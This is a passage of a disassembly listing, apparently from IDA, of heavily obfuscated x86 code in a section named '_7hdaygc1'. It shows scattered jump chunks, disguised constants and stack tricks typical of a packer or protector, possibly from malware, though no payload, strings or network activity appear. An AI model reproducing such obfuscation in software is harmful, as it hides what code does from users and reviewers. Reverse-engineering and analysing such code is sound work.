; END OF FUNCTION CHUNK FOR sub_425E64
; ---------------------------------------------------------------------------
loc_424659: ; CODE XREF: _7hdaygc1:004292BC�j
jmp loc_42BAFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BB83
loc_42465E: ; CODE XREF: sub_42BB83-EB4�j
push 0
jmp loc_42BE07
; END OF FUNCTION CHUNK FOR sub_42BB83
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_424665: ; CODE XREF: sub_423DFC:loc_42A0E0�j
pop eax
xor eax, 0B1EE93D2h
add eax, 60F54834h
rol eax, 1Fh
test eax, 400h
jmp loc_42440B
; END OF FUNCTION CHUNK FOR sub_423DFC
; =============== S U B R O U T I N E =======================================
sub_424680 proc near ; CODE XREF: sub_42581B:loc_42844D�p
; _7hdaygc1:0042D7F9�j
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 004244B0 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004258C3 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00426196 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042725C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428BA9 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 0042AB47 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C889 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EAC9 SIZE 00000013 BYTES
xchg edx, [esp+0]
pop edx
pop ecx
shl eax, 7
mov edx, [ebp+8]
mov edx, [edx-8]
or edx, 40h
jmp loc_426196
sub_424680 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
or eax, 901FD032h ; DATA XREF: _7hdaygc1:00427E8F�r
dec edi
; START OF FUNCTION CHUNK FOR sub_424B63
loc_42469C: ; CODE XREF: sub_424B63+9F9A�j
jmp loc_42906C
; END OF FUNCTION CHUNK FOR sub_424B63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_4246A1: ; CODE XREF: sub_423DFC+5BCA�j
jmp loc_42D992
; END OF FUNCTION CHUNK FOR sub_423DFC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428917
loc_4246A6: ; CODE XREF: sub_428917+A�j
jmp nullsub_18
; END OF FUNCTION CHUNK FOR sub_428917
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B74A
loc_4246AB: ; CODE XREF: sub_42B74A-345C�j
jmp loc_42D34C
; END OF FUNCTION CHUNK FOR sub_42B74A
; ---------------------------------------------------------------------------
dd 0A65CBE41h
dword_4246B4 dd 41F2006Bh ; sub_424F62+7580�w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428E56
loc_4246B8: ; CODE XREF: sub_428E56+49EF�j
jmp loc_427FD7
; END OF FUNCTION CHUNK FOR sub_428E56
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BFC
loc_4246BD: ; CODE XREF: sub_425BFC+694C�j
jmp nullsub_120
; END OF FUNCTION CHUNK FOR sub_425BFC
; ---------------------------------------------------------------------------
loc_4246C2: ; CODE XREF: _7hdaygc1:0042C1FE�j
jmp loc_42DFD0
; ---------------------------------------------------------------------------
db 43h
dword_4246C8 dd 0CF7C80B4h ; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429968
loc_4246CC: ; CODE XREF: sub_429968+9�j
jmp loc_4237ED
; END OF FUNCTION CHUNK FOR sub_429968
; ---------------------------------------------------------------------------
loc_4246D1: ; CODE XREF: _7hdaygc1:0042BB71�j
jo loc_4235F8
; =============== S U B R O U T I N E =======================================
sub_4246D7 proc near ; CODE XREF: sub_42F05E-4A25�p
; FUNCTION CHUNK AT 00424DD9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00424E97 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004253EA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426625 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004286AD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042988F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CE42 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042D6B7 SIZE 00000024 BYTES
xchg edx, [esp+0]
pop edx
jnz loc_42D6C5
mov eax, [ebp+8]
mov eax, [eax-8]
or eax, 8
jmp loc_42988F
sub_4246D7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424CE0
loc_4246EF: ; CODE XREF: sub_424CE0+A10D�j
call sub_42A94C
mov edx, [ebp-4]
push 5F9CFBD0h
pop eax
rol eax, 1
and eax, 0F5123B52h
xor eax, 1B537181h
add eax, 0B6172C00h
jmp loc_425048
; END OF FUNCTION CHUNK FOR sub_424CE0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B942
loc_424716: ; CODE XREF: sub_42B942:loc_42BA9A�j
call sub_424385
; END OF FUNCTION CHUNK FOR sub_42B942
; START OF FUNCTION CHUNK FOR sub_427EF6
loc_42471B: ; CODE XREF: sub_427EF6-2CBD�j
jnz loc_427FC7
jmp loc_42CDB6
; END OF FUNCTION CHUNK FOR sub_427EF6
; ---------------------------------------------------------------------------
sub ebp, edi
jmp loc_42C367
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423410
loc_42472D: ; CODE XREF: sub_423410:loc_42E583�j
jl loc_424FF6
; END OF FUNCTION CHUNK FOR sub_423410
; START OF FUNCTION CHUNK FOR sub_4266F8
loc_424733: ; CODE XREF: sub_4266F8+E�j
jmp loc_42CEFC
; END OF FUNCTION CHUNK FOR sub_4266F8
; ---------------------------------------------------------------------------
add ecx, ebp
cmp esi, eax
jmp loc_4239AC
; ---------------------------------------------------------------------------
loc_424741: ; CODE XREF: _7hdaygc1:0042B8CE�j
shr esi, 11h
; =============== S U B R O U T I N E =======================================
sub_424744 proc near ; CODE XREF: sub_425A37+45FB�p
; FUNCTION CHUNK AT 004243B2 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004245E9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004288A3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042895B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428EC7 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00429884 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429B5D SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042BC6D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C1C4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D7D4 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042E150 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042F941 SIZE 00000006 BYTES
xchg esi, [esp+0]
pop esi
or eax, eax
jnz loc_42D7D4
jmp loc_42895B
sub_424744 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_424755 proc near ; DATA XREF: _7hdaygc1:0042AE83�o
; FUNCTION CHUNK AT 0042AFEB SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042DC8C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042DEB9 SIZE 00000005 BYTES
xchg edx, [esp+0]
push edx
pop ebp
xchg eax, [esp+0]
mov edx, eax
pop eax
jmp loc_42AFEB
sub_424755 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_424765: ; DATA XREF: sub_42DB44-8359�o
add [esi], eax
call sub_42AB9F
; START OF FUNCTION CHUNK FOR sub_42BAE7
loc_42476C: ; CODE XREF: sub_42BAE7-804A�j
jmp loc_429E69
; END OF FUNCTION CHUNK FOR sub_42BAE7
; ---------------------------------------------------------------------------
loc_424771: ; CODE XREF: _7hdaygc1:00424940�j
jbe loc_42EA8D
not esi
and ecx, 5920EE2Ah
jmp loc_429A39
; ---------------------------------------------------------------------------
not eax
rol eax, 1Bh
jmp sub_425C3B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_216. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
call sub_42A2EF
loc_424794: ; CODE XREF: _7hdaygc1:0042C906�j
jmp loc_428AA1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F621
loc_424799: ; CODE XREF: sub_42F621:loc_4253E5�j
add eax, 32DAEDD2h
push eax
call sub_424AE1
locret_4247A5: ; CODE XREF: _7hdaygc1:0042E324�j
retn
; END OF FUNCTION CHUNK FOR sub_42F621
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4268BD
loc_4247A6: ; CODE XREF: sub_4268BD-1CEE�j
jmp sub_42C1AF
; END OF FUNCTION CHUNK FOR sub_4268BD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426EBD
loc_4247AB: ; CODE XREF: sub_426EBD:loc_428B45�j
push offset sub_424DA7
jmp nullsub_196
; END OF FUNCTION CHUNK FOR sub_426EBD
; ---------------------------------------------------------------------------
loc_4247B5: ; DATA XREF: sub_425FCB+7�o
dec dword ptr [ebp-18h]
jnz loc_42B157
jmp loc_42A0DB
; ---------------------------------------------------------------------------
loc_4247C3: ; CODE XREF: _7hdaygc1:004248F7�j
sub ebx, eax
push offset sub_427E76
jmp loc_42E80E
; ---------------------------------------------------------------------------
loc_4247CF: ; CODE XREF: _7hdaygc1:004235F3�j
and ebx, esi
jbe loc_42CB12
sbb ebp, eax
loc_4247D9: ; CODE XREF: _7hdaygc1:loc_42EE16�j
push offset sub_42D50E
jmp locret_42D06B
; ---------------------------------------------------------------------------
loc_4247E3: ; CODE XREF: _7hdaygc1:00429A97�j
add eax, ecx
jge loc_42D146
loc_4247EB: ; CODE XREF: _7hdaygc1:loc_429A8B�j
xor edi, 807CF559h
cmp ebx, edi
jmp loc_42E32A
; ---------------------------------------------------------------------------
locret_4247F8: ; CODE XREF: _7hdaygc1:004237FF�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B6B5
loc_4247F9: ; CODE XREF: sub_42B6B5-7F08�j
jmp loc_428D03
; END OF FUNCTION CHUNK FOR sub_42B6B5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_143. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429532
loc_4247FF: ; CODE XREF: sub_429532+3630�j
jmp loc_426879
; END OF FUNCTION CHUNK FOR sub_429532
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429D1B
loc_424804: ; CODE XREF: sub_429D1B-4D51�j
jmp nullsub_215
; END OF FUNCTION CHUNK FOR sub_429D1B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A052
loc_424809: ; CODE XREF: sub_42A052:loc_427F96�j
jz loc_429A5A
jmp loc_426417
; END OF FUNCTION CHUNK FOR sub_42A052
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42581B
loc_424814: ; CODE XREF: sub_42581B+79BB�j
call sub_42A3F7
jmp loc_42860E
; ---------------------------------------------------------------------------
loc_42481E: ; CODE XREF: sub_42581B+4�j
mov eax, [ebp+8]
test byte ptr [eax-10h], 38h
jnz loc_42619E
mov eax, [ebp+8]
push eax
jmp loc_4262B9
; END OF FUNCTION CHUNK FOR sub_42581B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_424834: ; CODE XREF: sub_42AFFE+37D8�j
push 0D41564C6h
xchg ebx, [esp+0]
mov eax, ebx
pop ebx
and eax, 479E968Ah
jnz loc_424BED
loc_42484B: ; CODE XREF: sub_427D11+2FDD�j
jmp loc_4280CF
; END OF FUNCTION CHUNK FOR sub_42AFFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CFDA
loc_424850: ; CODE XREF: sub_42CFDA-3176�j
jmp loc_42AC6E
; END OF FUNCTION CHUNK FOR sub_42CFDA
; ---------------------------------------------------------------------------
and ebx, edx
xchg eax, [ebp+0]
jmp loc_424BED
; ---------------------------------------------------------------------------
test esi, 0B6563448h
jmp loc_423642
; ---------------------------------------------------------------------------
loc_42486A: ; DATA XREF: sub_42D2E7+9�o
mov eax, [eax+0Ch]
mov eax, [eax+0Ch]
loc_424870: ; CODE XREF: _7hdaygc1:loc_42787E�j
; _7hdaygc1:loc_42AA65�j
push offset sub_425339
jmp loc_42F5B1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C3B
loc_42487A: ; CODE XREF: sub_425C3B:loc_429976�j
; _7hdaygc1:00429986�j
add ebx, 0DB5E4C4Bh
add ebx, ebp
add ebx, 7E52CDB4h
mov [ebx], eax
jmp loc_42E706
; END OF FUNCTION CHUNK FOR sub_425C3B
; ---------------------------------------------------------------------------
jb loc_42F3C9
jmp sub_4252C8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423410
loc_42489A: ; CODE XREF: sub_423410:loc_42A3F2�j
jnz loc_429917
; END OF FUNCTION CHUNK FOR sub_423410
; START OF FUNCTION CHUNK FOR sub_4288FE
loc_4248A0: ; CODE XREF: sub_4288FE-2D62�j
jmp loc_42F89A
; END OF FUNCTION CHUNK FOR sub_4288FE
; ---------------------------------------------------------------------------
sbb edx, esi
jmp loc_42990F
; ---------------------------------------------------------------------------
loc_4248AC: ; CODE XREF: _7hdaygc1:0042CC1E�j
mov [ebp-4], eax
cmp dword ptr [ebp-0Ch], 0
jle loc_42AAD9
jmp loc_427276
; ---------------------------------------------------------------------------
loc_4248BE: ; CODE XREF: _7hdaygc1:loc_42CC0F�j
add esp, 0FFFFFFF0h
mov [ebp-0Ch], ecx
mov [ebp-8], edx
mov [ebp-4], eax
jmp loc_42E809
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42567E
loc_4248CF: ; CODE XREF: sub_42567E:loc_42AD69�j
push ecx
call sub_424494
loc_4248D5: ; CODE XREF: sub_42EB0D-4197�j
jmp loc_42E370
; END OF FUNCTION CHUNK FOR sub_42567E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A2EF
loc_4248DA: ; CODE XREF: sub_42A2EF-5033�j
jmp loc_42A50C
; END OF FUNCTION CHUNK FOR sub_42A2EF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424E7E
loc_4248DF: ; CODE XREF: sub_424E7E+7�j
jmp loc_42BF91
; END OF FUNCTION CHUNK FOR sub_424E7E
; ---------------------------------------------------------------------------
loc_4248E4: ; DATA XREF: sub_425C5F+2�o
and edx, eax
setnz byte ptr [ebp-5]
call sub_428C3B
mov edx, ds:dword_42BC58
mov ebx, [edx]
jmp loc_4247C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F65A
loc_4248FC: ; CODE XREF: sub_42F65A:loc_42A787�j
push offset loc_42332A
jmp loc_42857B
; END OF FUNCTION CHUNK FOR sub_42F65A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_424906: ; CODE XREF: sub_42C16F:loc_425991�j
; sub_42C16F+EDA�j
call sub_42D757
push 0A830F2F5h
pop edx
or edx, 0C3CE57D0h
sub edx, 133B23FCh
add edx, 0E3AFC5C7h
push eax
pushf
jmp loc_42A276
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA47
loc_42492A: ; CODE XREF: sub_42AA47+1584�j
jge loc_429A39
loc_424930: ; CODE XREF: _7hdaygc1:0042A6A8�j
jmp sub_42D8FB
; END OF FUNCTION CHUNK FOR sub_42AA47
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272FB
loc_424935: ; CODE XREF: sub_4272FB+1D�j
jmp loc_426B12
; END OF FUNCTION CHUNK FOR sub_4272FB
; ---------------------------------------------------------------------------
cmp esi, 89F65C0Fh
jmp loc_424771
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_67. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42567E
loc_424946: ; CODE XREF: sub_42567E+2AD9�j
and ebx, 69B00945h
test edi, 0C529D2F5h
jmp loc_42D8FC
; END OF FUNCTION CHUNK FOR sub_42567E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DEA0
loc_424957: ; CODE XREF: sub_42DEA0:loc_42B3C9�j
xor edx, edx
call sub_423F3E
; END OF FUNCTION CHUNK FOR sub_42DEA0
; START OF FUNCTION CHUNK FOR sub_42DB44
loc_42495E: ; CODE XREF: sub_42DB44-36B5�j
jmp loc_42FAF3
; END OF FUNCTION CHUNK FOR sub_42DB44
; =============== S U B R O U T I N E =======================================
sub_424963 proc near ; CODE XREF: sub_42BDCF+5�p
; sub_424744:loc_42C1C4�j
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0042524A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425546 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00426EE1 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00427CE2 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00429BA0 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042B40B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042BD92 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042C1B9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CC88 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042D0B8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042D3C7 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0042D532 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042E891 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042F92B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FB9E SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
mov eax, [ebp-18h]
shl eax, 2
cdq
jz loc_42CC88
add eax, [esp-4+arg_0]
adc edx, [esp-4+arg_4]
jmp loc_427CE2
sub_424963 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_51. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_424981 proc near ; CODE XREF: sub_42AB66�j
; DATA XREF: sub_426A39+4123�o
mov esi, [eax]
add eax, 4
call sub_42E481
loc_42498B: ; CODE XREF: sub_42E51C-1A9E�j
jmp nullsub_144
sub_424981 endp
; ---------------------------------------------------------------------------
jbe loc_4241FD
jg loc_4236D4
jmp sub_428818
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA47
loc_4249A1: ; CODE XREF: sub_42AA47:loc_425E53�j
; sub_42AA47-41F0�j
call sub_42D757
mov edx, 0F75CA70h
push edx
push 4CC8F76Dh
jmp loc_42B6E3
; END OF FUNCTION CHUNK FOR sub_42AA47
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D002
loc_4249B6: ; CODE XREF: sub_42D002-42A4�j
mov ebx, edx
xchg ebx, [esp+0]
push edx
push 85CDFA40h
pop edx
or edx, 18FDF37Bh
xor edx, 9DFDFB7Bh
jmp loc_42E233
; END OF FUNCTION CHUNK FOR sub_42D002
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42874A
loc_4249D3: ; CODE XREF: sub_42874A+5C81�j
pop edi
add edi, 673F84B0h
and edi, 6F174D08h
cmp edi, 8A4EACD6h
jmp loc_4236A9
; END OF FUNCTION CHUNK FOR sub_42874A
; ---------------------------------------------------------------------------
jns loc_42508F
cmp edx, 565A270Ah
jmp loc_42959C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A92E
loc_4249FC: ; CODE XREF: sub_42A92E+8�j
jz loc_42EDA4
jmp loc_426A1D
; END OF FUNCTION CHUNK FOR sub_42A92E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427D3A
loc_424A07: ; CODE XREF: sub_427D3A:loc_427F9B�j
xor ebx, 3E7E03Fh
rol ebx, 1Dh
add ebx, 30D1C37Dh
push offset loc_42CE9D
jmp loc_429106
; END OF FUNCTION CHUNK FOR sub_427D3A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_46. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_424A21: ; CODE XREF: _7hdaygc1:0042F5FE�j
jmp loc_423C1E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427F72
loc_424A26: ; CODE XREF: sub_427F72-28A6�j
jmp sub_42C1AF
; END OF FUNCTION CHUNK FOR sub_427F72
; =============== S U B R O U T I N E =======================================
sub_424A2B proc near ; DATA XREF: sub_42AFFE-322E�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004242FC SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004250CB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429E4D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042BB48 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042C2F0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C99B SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042F2DF SIZE 00000010 BYTES
push ebp
mov ebp, eax
call sub_42F291
loc_424A33: ; CODE XREF: sub_4263F9+19�j
jmp loc_429E4D
sub_424A2B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427D8E
loc_424A38: ; CODE XREF: sub_427D8E:loc_42F61C�j
mov eax, [ebp-4]
call sub_42BFDF
mov edx, [ebp-8]
mov eax, [ebp-4]
call nullsub_4
; END OF FUNCTION CHUNK FOR sub_427D8E
; START OF FUNCTION CHUNK FOR sub_425BAD
loc_424A4B: ; CODE XREF: sub_425BAD+908�j
; sub_42F65A-4F04�j
pop ecx
jmp loc_42BFDB
; END OF FUNCTION CHUNK FOR sub_425BAD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_104. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBD6
loc_424A52: ; CODE XREF: sub_42EBD6-62EE�j
jmp loc_42875E
; END OF FUNCTION CHUNK FOR sub_42EBD6
; ---------------------------------------------------------------------------
test edi, eax
jmp loc_42D8A8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4289CE
loc_424A5E: ; CODE XREF: sub_4289CE+2F91�j
add eax, ebp
add eax, 0EFF2010Fh
mov eax, [eax]
push offset sub_428B5B
jmp loc_42C986
; END OF FUNCTION CHUNK FOR sub_4289CE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_424A72: ; CODE XREF: sub_42C16F+3�j
xchg edx, [esp+8+var_8]
loc_424A75: ; CODE XREF: sub_42C177+6�j
mov ebp, esp
push esi
mov esi, ecx
xchg esi, [esp+0]
mov [ebp-4], eax
jmp loc_42850C
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F789
loc_424A85: ; CODE XREF: sub_42F789:loc_424E92�j
dec dword ptr [ebp-0Ch]
cmp dword ptr [ebp-0Ch], 0
jg loc_42F793
jmp loc_42811B
; ---------------------------------------------------------------------------
loc_424A97: ; CODE XREF: sub_42F789-ABDD�j
shr eax, 6
mov edx, [ebp-4]
jmp loc_42D605
; END OF FUNCTION CHUNK FOR sub_42F789
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_31. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_424AA3: ; CODE XREF: sub_42C443-7EDE�j
jmp sub_4232DA
; END OF FUNCTION CHUNK FOR sub_42C443
; =============== S U B R O U T I N E =======================================
sub_424AA8 proc near ; DATA XREF: _7hdaygc1:00427049�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00426086 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00426BDF SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00427C8D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004282C0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428794 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042AF52 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0042C219 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042C9D0 SIZE 00000013 BYTES
push ecx
mov esp, ebp
pop ebp
push 623CBF81h
jmp loc_426086
sub_424AA8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_424AB6: ; CODE XREF: _7hdaygc1:00428F7C�j
mov edi, esi
pop esi
and edi, 877520FFh
xor edi, 85351F76h
jmp loc_426902
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427F72
loc_424ACA: ; CODE XREF: sub_427F72:loc_42BA9F�j
mov edi, ebx
pop ebx
add edi, 24FDDE7Eh
rol edi, 0Ah
test edi, 8000h
jmp loc_42F6B0
; END OF FUNCTION CHUNK FOR sub_427F72
; =============== S U B R O U T I N E =======================================
sub_424AE1 proc near ; CODE XREF: sub_42F621-AE81�p
; _7hdaygc1:0042DF92�j
; FUNCTION CHUNK AT 00423557 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004238D7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423A5C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00424224 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004253E0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042546D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425FAD SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00426671 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00426D25 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428022 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00428359 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042859B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00428DCA SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00428E61 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042933F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00429460 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00429867 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042990A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429BED SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429F17 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042A162 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042A19A SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042B198 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B3CF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B7BB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042BB9A SIZE 00000027 BYTES
; FUNCTION CHUNK AT 0042D11D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042DB8C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E55D SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042E939 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042EF10 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F0BA SIZE 00000017 BYTES
xchg esi, [esp+0]
pop esi
call sub_429B49
push ebp
mov ebp, ecx
xchg ebp, [esp+0]
push 38F726BAh
pop ecx
jmp loc_429460
sub_424AE1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282A9
loc_424AFB: ; CODE XREF: sub_4282A9-4805�j
sbb esi, edx
popf
and eax, 10807B51h
loc_424B04: ; CODE XREF: sub_4282A9:loc_428FBD�j
lea eax, sub_428F69
push esi
push offset loc_42DECD
jmp nullsub_198
; END OF FUNCTION CHUNK FOR sub_4282A9
; ---------------------------------------------------------------------------
mov esi, 7130A5F1h
rol edx, 12h
jmp sub_425670
; ---------------------------------------------------------------------------
cmp ebp, edx
jmp loc_42B0C6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_79. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E695
loc_424B2A: ; CODE XREF: sub_42E695-2306�j
jz loc_423B63
jmp loc_425B5D
; END OF FUNCTION CHUNK FOR sub_42E695
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423752
loc_424B35: ; CODE XREF: sub_423752+11�j
sub edx, 0B18EAF6Ah
xor edx, 7458B50Fh
and edx, ds:4000F3h
jns loc_4238DD
loc_424B4D: ; CODE XREF: sub_42D84A+F0B�j
jmp loc_42BA77
; END OF FUNCTION CHUNK FOR sub_423752
; ---------------------------------------------------------------------------
jge loc_425EE2
jge loc_428824
jmp loc_42FB3A
; =============== S U B R O U T I N E =======================================
sub_424B63 proc near ; CODE XREF: sub_42F1C6-860C�p
; _7hdaygc1:0042D770�j
; FUNCTION CHUNK AT 0042469C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004266AF SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042694D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426D39 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042858E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042906C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042C78F SIZE 00000008 BYTES
